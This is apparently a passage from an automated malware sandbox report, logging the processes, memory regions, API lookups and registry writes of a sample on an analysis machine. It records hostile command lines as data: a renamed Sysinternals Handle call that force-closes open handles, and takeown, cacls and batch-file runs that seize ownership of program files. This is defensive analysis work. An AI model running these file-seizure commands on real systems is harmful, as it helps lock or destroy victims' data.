| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:43 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #227: g13k6qzj64.exe
61
0
| Information | Value |
|---|---|
| ID | #227 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe00 |
| Parent PID | 0xc50 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A88
0x
988
0x
2EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00240000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00727fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x01ddffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4b9000 | 0x7f4b9000 | 0x7f4b9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff8000 | 0x7ff5ffff8000 | 0x7ff5ffff9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (37)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #228: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #228 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:33, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd90 |
| Parent PID | 0x128 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
228
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ca0000 | 0x00ca0000 | 0x04c9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ca0000 | 0x04ca0000 | 0x04caffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04cb3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cc1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04cc0000 | 0x04cc4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004cd0000 | 0x04cd0000 | 0x04ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d70000 | 0x04d70000 | 0x04d73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d80000 | 0x04d80000 | 0x04d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04d91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04da0000 | 0x04e5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x050effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04f00000 | 0x04f29fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04f00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x050effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050f0000 | 0x050f0000 | 0x05277fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005280000 | 0x05280000 | 0x05400fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005410000 | 0x05410000 | 0x0680ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06810000 | 0x06b46fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9b0000 | 0x7f9b0000 | 0x7faaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fab0000 | 0x7fab0000 | 0x7fad2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fad3000 | 0x7fad3000 | 0x7fad3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fad6000 | 0x7fad6000 | 0x7fad6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fada000 | 0x7fada000 | 0x7fadcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fadd000 | 0x7fadd000 | 0x7fadffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #229: cmd.exe
0
0
| Information | Value |
|---|---|
| ID | #229 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:34, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x54c |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000600000 | 0x00600000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x0060ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x00621fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x00643fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00793fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee30000 | 0x7ee30000 | 0x7ef2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef30000 | 0x7ef30000 | 0x7ef52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef58000 | 0x7ef58000 | 0x7ef58fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5a000 | 0x7ef5a000 | 0x7ef5cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5d000 | 0x7ef5d000 | 0x7ef5dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #230: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #230 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\wab.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:34, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd20 |
| Parent PID | 0xd94 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D38
0x
DF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000000b0000 | 0x000b0000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00183fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x001b0000 | 0x001b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
